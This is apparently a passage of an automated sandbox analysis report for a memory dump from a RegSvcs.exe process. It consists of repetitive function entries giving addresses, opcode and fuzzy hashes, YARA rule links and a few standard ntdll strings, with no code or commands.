                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d3c19a870f5bfc7e3336adbad1f5683318f8e46cc164c1044bdf4d6563cb6bc
                                                        • Instruction ID: 83f03ab27ceb34e8506a6d8bb7c12b88fda2fa14d41b05bfda64488891129807
                                                        • Opcode Fuzzy Hash: 9d3c19a870f5bfc7e3336adbad1f5683318f8e46cc164c1044bdf4d6563cb6bc
                                                        • Instruction Fuzzy Hash: 6990023160540802D15075584818747000997D0301F55C121A4024754EC7558F5577A1
                                                        Function 01662B80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c5b2c55409f5be972b2846da9632008c6a88802b4af4ec50c23641d99da3cc0c
                                                        • Instruction ID: f740f227d4ccd97c60f894749862203e01d864ac7c840700ab5ac454172667af
                                                        • Opcode Fuzzy Hash: c5b2c55409f5be972b2846da9632008c6a88802b4af4ec50c23641d99da3cc0c
                                                        • Instruction Fuzzy Hash: 7290023120140802D10475584C08687000997D0301F55C121AA024755FD6658D917231
                                                        Function 01662AF0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0549a3e63423b6006877f54c648af8402c3525380764edd321d08bdd992a0121
                                                        • Instruction ID: f5e96baa7a7fc60b6beaa8ea9678d25e1f5908b341f11ba2dcf336f4226a8815
                                                        • Opcode Fuzzy Hash: 0549a3e63423b6006877f54c648af8402c3525380764edd321d08bdd992a0121
                                                        • Instruction Fuzzy Hash: 2B900225221400020145B9580A0850B0449A7D6351395C125F5416690DC6218D655321
                                                        Function 01662AD0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e93b157703c2a8edba07a0835b37a589a07f98f219307276279df38eaed497fb
                                                        • Instruction ID: 22a0c5602167dc04f56710278e5ac1d60890ac0f729e9f2b723f2e14867e28d5
                                                        • Opcode Fuzzy Hash: e93b157703c2a8edba07a0835b37a589a07f98f219307276279df38eaed497fb
                                                        • Instruction Fuzzy Hash: C6900435311400030105FD5C0F0C507004FD7D5351355C131F5015750DD731CD715331
                                                        Function 01662AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 32e2d9ef0ac5ac6136f8cc178ba8284c5aa593340866f0031cf12e4c15a958d8
                                                        • Instruction ID: ca783e9f1b678f294d46f28c7d12e69ee4bd81cb892e94d1575bbcda220e1c6e
                                                        • Opcode Fuzzy Hash: 32e2d9ef0ac5ac6136f8cc178ba8284c5aa593340866f0031cf12e4c15a958d8
                                                        • Instruction Fuzzy Hash: 9B9002A1201540924500B6588808B0B450997E0201B55C126E5054660DC5258D519235
                                                        Function 01662D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57ed11ce04f73bae528b7a15e76a5fb5af136af5a6cfa2209e91dc89003f109f
                                                        • Instruction ID: 077264464a19b4303da0f0ba24ea8771e0188bf338d04d41d1381306e3ec3074
                                                        • Opcode Fuzzy Hash: 57ed11ce04f73bae528b7a15e76a5fb5af136af5a6cfa2209e91dc89003f109f
                                                        • Instruction Fuzzy Hash: 5990022130140003D1407558581C6074009E7E1301F55D121E4414654DD9158D565322
                                                        Function 01662D00 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04adb0fc40d7ea4debdd3fc52cd9a638a810730bdf506a7a3e6fb1631d7ee54b
                                                        • Instruction ID: 53c5da4b0dd24fee8639edd387089d6d85ded672696ff297731d250f2e19685b
                                                        • Opcode Fuzzy Hash: 04adb0fc40d7ea4debdd3fc52cd9a638a810730bdf506a7a3e6fb1631d7ee54b
                                                        • Instruction Fuzzy Hash: 8C90022120544442D1007958580CA07000997D0205F55D121A5064695EC6358D51A231
                                                        Function 01662D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d18123388768f473314c7a4bc8a621c4c3a1f57f6425e76d0d7f97cc49e09338
                                                        • Instruction ID: 23c44f9f7c0ccdde50e8a47e1582190f4d1dc869a6600f3b7a53e985c6ab7b2d
                                                        • Opcode Fuzzy Hash: d18123388768f473314c7a4bc8a621c4c3a1f57f6425e76d0d7f97cc49e09338
                                                        • Instruction Fuzzy Hash: A290022921340002D1807558580C60B000997D1202F95D525A4015658DC9158D695321
                                                        Function 01662DD0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3340b977abc0a125eb1d30446df286bb8c406af4b03142260aee87f5857f63db
                                                        • Instruction ID: 9092915bf9b2b0314d6c4f44d434a8849fcda06ff662cf15e2b9e3beb717f164
                                                        • Opcode Fuzzy Hash: 3340b977abc0a125eb1d30446df286bb8c406af4b03142260aee87f5857f63db
                                                        • Instruction Fuzzy Hash: 8E900221242441525545B5584808507400AA7E0241795C122A5414A50DC5269D56D721
                                                        Function 01662DB0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65f277dfc95fe6dbbe16dc410dd7c36d594d10555f314e01bb168c7f674a8045
                                                        • Instruction ID: e2cf5fc8dbfcd8cc3df00955539fe7d947e6500ddf59e624cfda916b19763376
                                                        • Opcode Fuzzy Hash: 65f277dfc95fe6dbbe16dc410dd7c36d594d10555f314e01bb168c7f674a8045
                                                        • Instruction Fuzzy Hash: 7A90023124140402D14175584808607000DA7D0241F95C122A4424654FC6558F56AB61
                                                        Function 01662C60 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd7135d4b5395fd567ed0d10ca89bfdf709aaf3c15108ead6feacb13967a8a12
                                                        • Instruction ID: 77a5ef659118583d8e456265b839763a5c3ff70327c21284cabfcb7172037a52
                                                        • Opcode Fuzzy Hash: fd7135d4b5395fd567ed0d10ca89bfdf709aaf3c15108ead6feacb13967a8a12
                                                        • Instruction Fuzzy Hash: 0C90023120140842D10075584808B47000997E0301F55C126A4124754EC615CD517621
                                                        Function 01662CF0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf45d9351f5c3628e64ad7f31a27eded5ba6b3e550f91b90e2c4e89c3f6c7bf8
                                                        • Instruction ID: 60555c2fe0896c56c24f157ef53b400b4ad825e70ea5e3149bbd0bec0a997e0e
                                                        • Opcode Fuzzy Hash: cf45d9351f5c3628e64ad7f31a27eded5ba6b3e550f91b90e2c4e89c3f6c7bf8
                                                        • Instruction Fuzzy Hash: 5790023120140403D1007558590C707000997D0201F55D521A4424658ED6568D516221
                                                        Function 01662CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a7295a7f561ce86f22451e8bd7f70f47d78b753ac7a5f9ab22f0125925f83e5
                                                        • Instruction ID: 5aa5c98cf53d9c2237c685970c384b0e477ef91ea39f485699e92ed05ec17506
                                                        • Opcode Fuzzy Hash: 6a7295a7f561ce86f22451e8bd7f70f47d78b753ac7a5f9ab22f0125925f83e5
                                                        • Instruction Fuzzy Hash: D090022160540402D1407558581C707001997D0201F55D121A4024654EC6598F5567A1
                                                        Function 01662CA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae21458706c8cfc987989e26298a1388cce1e368ccc0b41b065301feddffc57b
                                                        • Instruction ID: 0f9aa48dc1d1c748ba24fd6d056fac7becae8afbb45ecd7bf4f8f4db6008dd1b
                                                        • Opcode Fuzzy Hash: ae21458706c8cfc987989e26298a1388cce1e368ccc0b41b065301feddffc57b
                                                        • Instruction Fuzzy Hash: 3690023120140402D1007998580C647000997E0301F55D121A9024655FC6658D916231
                                                        Function 01662F60 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39a8b49c6abe5535838ed74d46d1e9d8bfd7923a1e5f72060535e641c0ff0e08
                                                        • Instruction ID: 117049bc8f1ebba074339039371ddece1dd3cdeb116a06562eb4dcd8cfd00a5b
                                                        • Opcode Fuzzy Hash: 39a8b49c6abe5535838ed74d46d1e9d8bfd7923a1e5f72060535e641c0ff0e08
                                                        • Instruction Fuzzy Hash: 8790026121140042D10475584808707004997E1201F55C122A6154654DC5298D615225
                                                        Function 01662F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd2b905cef66ad6a07b87ea3a770047ca010ce8a26a738e073bc989f41f91d20
                                                        • Instruction ID: a8a622882e7305bc52a6ecbf61ce57e479468eff335fd8617a0820ab1c71a580
                                                        • Opcode Fuzzy Hash: cd2b905cef66ad6a07b87ea3a770047ca010ce8a26a738e073bc989f41f91d20
                                                        • Instruction Fuzzy Hash: 2690026134140442D10075584818B070009D7E1301F55C125E5064654EC619CD526226
                                                        Function 01662FE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09a276320106d45e2f1116ec997258b03398b2108c07911e1bface4d6df402b4
                                                        • Instruction ID: c1b14f7557f880ec428c1de71a6eff494f0090edb1a17938333871d27bef3753
                                                        • Opcode Fuzzy Hash: 09a276320106d45e2f1116ec997258b03398b2108c07911e1bface4d6df402b4
                                                        • Instruction Fuzzy Hash: 71900221211C0042D20079684C18B07000997D0303F55C225A4154654DC9158D615621
                                                        Function 01662FA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 196792a3c5c3028075dd2515d74ec65bf2135817d1393ebdbbc2d89cf798ceba
                                                        • Instruction ID: cde5eee2dde60fb12ba3673562aa9dfe6ad695fb9235b311a3c09cdd6748dea5
                                                        • Opcode Fuzzy Hash: 196792a3c5c3028075dd2515d74ec65bf2135817d1393ebdbbc2d89cf798ceba
                                                        • Instruction Fuzzy Hash: 6090023120180402D10075584C0C747000997D0302F55C121A9164655FC665CD916631
                                                        Function 01662FB0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a709a8b62622e0cd41b5351a4dccd56adef63b108c3473c6b3fa70fea500bea7
                                                        • Instruction ID: ccae4fdb42f9bdcf6bc8ffd2f993fdb2c939bc55f91398df76c5896a7296b46f
                                                        • Opcode Fuzzy Hash: a709a8b62622e0cd41b5351a4dccd56adef63b108c3473c6b3fa70fea500bea7
                                                        • Instruction Fuzzy Hash: 8890022160140042414075688C489074009BBE1211755C231A4998650EC5598D655765
                                                        Function 01662F90 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 628dda09b86533d8452499ada396680227262830ad24452897e47d6e737e6ad5
                                                        • Instruction ID: 8e3bd5dde2208af87f2cde39045525fa13dfe0f9ddd9418f29816b31d6598206
                                                        • Opcode Fuzzy Hash: 628dda09b86533d8452499ada396680227262830ad24452897e47d6e737e6ad5
                                                        • Instruction Fuzzy Hash: 0090023120180402D10075584C1870B000997D0302F55C121A5164655EC6258D516671
                                                        Function 01662E30 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 251f4b6a821b4dae1bc8e282d41af02f673c7f43223117878e81d7e17721ac02
                                                        • Instruction ID: 28b4aa8a27c52bdb473f534cc1543feffdf9c8c955c686446f88b64c2fbdf526
                                                        • Opcode Fuzzy Hash: 251f4b6a821b4dae1bc8e282d41af02f673c7f43223117878e81d7e17721ac02
                                                        • Instruction Fuzzy Hash: D390022130140402D10275584818607000DD7D1345F95C122E5424655EC6258E53A232
                                                        Function 01662EE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dfb01950cebd3f143f80a51df945819977e51e90c1b4a60cb034144e341048ba
                                                        • Instruction ID: 2e1ce91a7f488cadfe6d5accc48841c232ef44864bdd3301af7ea65ca856c242
                                                        • Opcode Fuzzy Hash: dfb01950cebd3f143f80a51df945819977e51e90c1b4a60cb034144e341048ba
                                                        • Instruction Fuzzy Hash: CB90026120180403D14079584C08607000997D0302F55C121A6064655FCA298D516235
                                                        Function 01662EA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6eefed697dc7baac61e392c7d45b1c304182fdb8af345db80c3faabc59ac4dc2
                                                        • Instruction ID: 577adceda164299ae625314c4a374c6e25363ad44c8e2849a63a6511d0c8ee05
                                                        • Opcode Fuzzy Hash: 6eefed697dc7baac61e392c7d45b1c304182fdb8af345db80c3faabc59ac4dc2
                                                        • Instruction Fuzzy Hash: 6590027120140402D14075584808747000997D0301F55C121A9064654FC6598ED56765
                                                        Function 01662E80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c18c85a2a4449529f2e95d2012287dac07077f080482b6f20e5403bfcbc632c3
                                                        • Instruction ID: 190e5d8c0731743c04a734760077fd6fbc74101c49768f65093c7f9ad80c4862
                                                        • Opcode Fuzzy Hash: c18c85a2a4449529f2e95d2012287dac07077f080482b6f20e5403bfcbc632c3
                                                        • Instruction Fuzzy Hash: AE90022160140502D10175584808617000E97D0241F95C132A5024655FCA258E92A231
                                                        Function 01663010 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ddb72e3fa5236036507f83a405d4909127a66257fbba038359a560d4d7a7a3d
                                                        • Instruction ID: 5bf35cadd7e2c6f50c0be09b2cdf374bad197f798c10bb2bd2c0950b371a3ced
                                                        • Opcode Fuzzy Hash: 0ddb72e3fa5236036507f83a405d4909127a66257fbba038359a560d4d7a7a3d
                                                        • Instruction Fuzzy Hash: 5190022120184442D14076584C08B0F410997E1202F95C129A8156654DC9158D555721
                                                        Function 01663090 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fc840ba902719ad8d1c07bc546d21e5b59a82cd960bce62bf7da605965aa908
                                                        • Instruction ID: 645c554d91c7dd2b096e7a8a6f325b0e3d09248151e35dc0ca6f73ba7007cbd5
                                                        • Opcode Fuzzy Hash: 2fc840ba902719ad8d1c07bc546d21e5b59a82cd960bce62bf7da605965aa908
                                                        • Instruction Fuzzy Hash: 3290022124140802D14075588818707000AD7D0601F55C121A4024654EC6168E6567B1
                                                        Function 016639B0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac69a2c92f80cb18f022a150538a136a979c63ece78f3e07f05e676db4940835
                                                        • Instruction ID: 709dd3cde8461db2643c8a009b63afea99958237d777b056589764d5c2370d56
                                                        • Opcode Fuzzy Hash: ac69a2c92f80cb18f022a150538a136a979c63ece78f3e07f05e676db4940835
                                                        • Instruction Fuzzy Hash: 7890022124545102D150755C48086174009B7E0201F55C131A4814694EC5558D556321
                                                        Function 01663D70 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 85bb78430f2524da7fedfbfb4cd7fc4ad20175ac443501e7f92955c2c9e3442e
                                                        • Instruction ID: 4493e6d715561b4e96ceef525f78d4a5cd6c6e48e7899f31d13cac6eaf019118
                                                        • Opcode Fuzzy Hash: 85bb78430f2524da7fedfbfb4cd7fc4ad20175ac443501e7f92955c2c9e3442e
                                                        • Instruction Fuzzy Hash: 7A90023520140402D51075585C08647004A97D0301F55D521A4424658EC6548DA1A221
                                                        Function 01663D10 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 830741c4cf8d523f6af5ddba51f0b38962d5c3529b4b680c0f014cd8e1397e9b
                                                        • Instruction ID: e745e012469c149039ed82dc5b28fd8169708aad1bf83794a589d82050dd0faf
                                                        • Opcode Fuzzy Hash: 830741c4cf8d523f6af5ddba51f0b38962d5c3529b4b680c0f014cd8e1397e9b
                                                        • Instruction Fuzzy Hash: 8B90023120240142954076585C08A4F410997E1302B95D525A4015654DC9148D615321
                                                        Function 01662C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction ID: 78dfd5bbceb54ca91cd4a2a6c994c42a56b28f6f3cc7643338e06eb382223418
                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction Fuzzy Hash:
                                                        Function 01662890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 948af4cab237965f37d761f4e84b4512b4044e34852d258e03040aea7b0814be
                                                        • Instruction ID: ce194fdff84d1b593d1b185d3136e6137ad8f754359c274ef26e8b7cca4ecd4a
                                                        • Opcode Fuzzy Hash: 948af4cab237965f37d761f4e84b4512b4044e34852d258e03040aea7b0814be
                                                        • Instruction Fuzzy Hash: 2851C1A6A00116AFDB11DFAD8CA097EFBBCBB48240714C26DE5A5D7641E334DE44CBA0
                                                        Function 016D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 5592e1dc890cb781fbb9ef2ffa511580059445618b5f1afbd58cf7d94a150669
                                                        • Instruction ID: b8020b33eb3e15f3bb24b63ce8950c95fa9a03a5598a4e48a96c4c453be463de
                                                        • Opcode Fuzzy Hash: 5592e1dc890cb781fbb9ef2ffa511580059445618b5f1afbd58cf7d94a150669
                                                        • Instruction Fuzzy Hash: C651F371E00646AEDB31DF9CCDA097FBBF9EB48200B44846DE996D7741E774EA408760
                                                        Function 01657630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01694787
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01694742
                                                        • Execute=1, xrefs: 01694713
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01694655
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016946FC
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01694725
